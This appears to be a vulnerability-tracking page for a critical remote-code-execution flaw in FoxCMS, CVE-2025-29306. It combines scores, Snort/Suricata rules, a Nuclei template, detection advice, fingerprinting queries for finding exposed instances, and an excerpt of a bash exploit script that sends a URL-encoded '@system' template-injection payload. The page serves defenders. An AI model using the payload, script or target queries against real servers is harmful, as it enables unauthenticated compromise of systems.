CVE-2025-29306
published 2025-03-27CVE-2025-29306: An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.
PriorityP184critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
43.66%
98.6th percentile
An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| foxcms | foxcms | < 1.2 | 1.2 |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FoxCMS id Parameter Command Injection Attempt (CVE-2025-29306)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/images/index.html|3f|id|3d 24|"; fast_pattern; content:"|40|print_r"; distance:0; content:"|40|system"; within:20; reference:url,github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-29306.yaml; reference:cve,2025-29306; classtype:attempted-admin; sid:2062497; rev:1; metadata:affected_product FoxCMS, attack_target Web_Server, tls_state plaintext, created_at 2025_05_21, cve CVE_2025_29306, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2025_05_21, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
yara
id: CVE-2025-29306
http:
- method: GET
path:
- "{{BaseURL}}/images/index.html?id=%24%7B%40print_r%28%40system%28%22{{command}}%22%29%29%7D"
matchers:
- type: regex
part: body
regex:
- "uid=[0-9]+\\(\\w+\\) gid=[0-9]+\\(\\w+\\)"
- "root:.*:0:0:"
- type: word
part: body
words:
- "foxcms"- →The attack targets the `id` GET parameter of `/images/index.html` with a PHP template injection payload using `@print_r(@system(...))` syntax. Look for URL-encoded `%24%7B%40print_r` or `%40system` in HTTP GET requests to this path.
- →FOFA and Shodan fingerprinting queries can identify exposed FoxCMS instances: search for `body="foxcms-logo"` or `html:"foxcms-logo"` to find targets.
- →Successful exploitation produces OS command output in the HTTP response body. Detect responses containing regex patterns `uid=[0-9]+\(\w+\) gid=[0-9]+\(\w+\)` or `root:.*:0:0:` alongside the word `foxcms`.
- →The exploit is unauthenticated (no login required). Any GET request to `/images/index.html` with a `$` character in the `id` parameter should be treated as suspicious.
- →The Snort/ET rule uses byte-level matching: HTTP URI must contain `/images/index.html?id=$` (hex: `/images/index.html|3f|id|3d 24|`) followed by `@print_r` (hex: `|40|print_r`) and `@system` (hex: `|40|system`) within 20 bytes.
- ·The exploit script parses command output from a specific XPath location in the HTML response (`/html/body/header/div[1]/div[2]/div[1]/ul`), meaning the injection point reflects output inside the page's navigation/header structure — useful for response-based detection tuning. ↗
- ·The Snort rule (sid:2062497) is marked `tls_state plaintext`, meaning it will NOT fire on HTTPS/TLS-encrypted traffic. Ensure SSL inspection is in place for full coverage.
- ·The vulnerability is in the `case display page` component (`index.html`), not a standard PHP endpoint. The injection is processed server-side as a PHP template expression, suggesting a template engine (not direct PHP eval) is involved. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8gwj-x84v-j8cc: An issue in FoxCMS v
ghsa_unreviewed·2025-03-27
CVE-2025-29306 [CRITICAL] CWE-94 GHSA-8gwj-x84v-j8cc: An issue in FoxCMS v
An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.
VulnCheck
foxcms foxcms Improper Control of Generation of Code ('Code Injection')
vulncheck·2025·CVSS 9.8
CVE-2025-29306 [CRITICAL] foxcms foxcms Improper Control of Generation of Code ('Code Injection')
foxcms foxcms Improper Control of Generation of Code ('Code Injection')
An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.
Affected: foxcms foxcms
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2025-29306; https://cyble.com/blog/vulnerabilities-under-attack/; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-29306&date=2025-10-17; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-29306&date=2025-10-18; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-29306&date=2025-10-19; http
Suricata
ET WEB_SPECIFIC_APPS FoxCMS id Parameter Command Injection Attempt (CVE-2025-29306)
suricata·2025-05-21·CVSS 9.8
CVE-2025-29306 [CRITICAL] ET WEB_SPECIFIC_APPS FoxCMS id Parameter Command Injection Attempt (CVE-2025-29306)
ET WEB_SPECIFIC_APPS FoxCMS id Parameter Command Injection Attempt (CVE-2025-29306)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FoxCMS id Parameter Command Injection Attempt (CVE-2025-29306)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/images/index.html|3f|id|3d 24|"; fast_pattern; content:"|40|print_r"; distance:0; content:"|40|system"; within:20; reference:url,github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-29306.yaml; reference:cve,2025-29306; classtype:attempted-admin; sid:2062497; rev:1; metadata:affected_product FoxCMS, attack_target Web_Server, tls_state plaintext, created_at 2025_05_21, cve CVE_2025_29306, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, sign
Exploit-DB
FoxCMS 1.2.5 - Remote Code Execution (RCE)
exploitdb·2025-04-19·CVSS 9.8
CVE-2025-29306 [CRITICAL] FoxCMS 1.2.5 - Remote Code Execution (RCE)
FoxCMS 1.2.5 - Remote Code Execution (RCE)
---
# Date: 2025-04-17
# Exploit Title:
# Exploit Author: VeryLazyTech
# Vendor Homepage: https://www.foxcms.org/
# Software Link: https://www.foxcms.cn/
# Version: FoxCMS v.1.2.5
# Tested on: Ubuntu 22.04, Windows Server 2019
# CVE: CVE-2025-29306
# Website: https://www.verylazytech.com
#!/bin/bash
banner() {
cat "
exit 1
fi
TARGET=$1
# Encode payload
ENCODED_CMD=$(python3 -c "import urllib.parse; print(urllib.parse.quote('\${@print_r(@system(\"$2\"))}'))")
FULL_URL="${TARGET}?id=${ENCODED_CMD}"
echo "[*] Sending RCE payload: $2"
HTML=$(curl -s "$FULL_URL")
# Extract from known XPath location using xmllint
UL_CONTENT=$(echo "$HTML" | xmllint --html --xpath "/html/body/header/div[1]/div[2]/div[1]/ul" - 2>/dev/null)
# Strip tags, clean up
Nuclei
FoxCMS v.1.2.5 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2025-29306 [CRITICAL] FoxCMS v.1.2.5 - Remote Code Execution
FoxCMS v.1.2.5 - Remote Code Execution
An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.
Template:
id: CVE-2025-29306
info:
name: FoxCMS v.1.2.5 - Remote Code Execution
author: ritikchaddha
severity: critical
description: |
An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.
impact: |
Unauthenticated attackers can execute arbitrary code through the id parameter in the index.html component, leading to complete server compromise.
remediation: |
Update to the latest version of FOXCMS if available. If no patch is available,implement WAF rules to block malicious requests to the /images/index.html endpoint with suspicious 'id' par
2025-03-27
Published
Exploited in the wild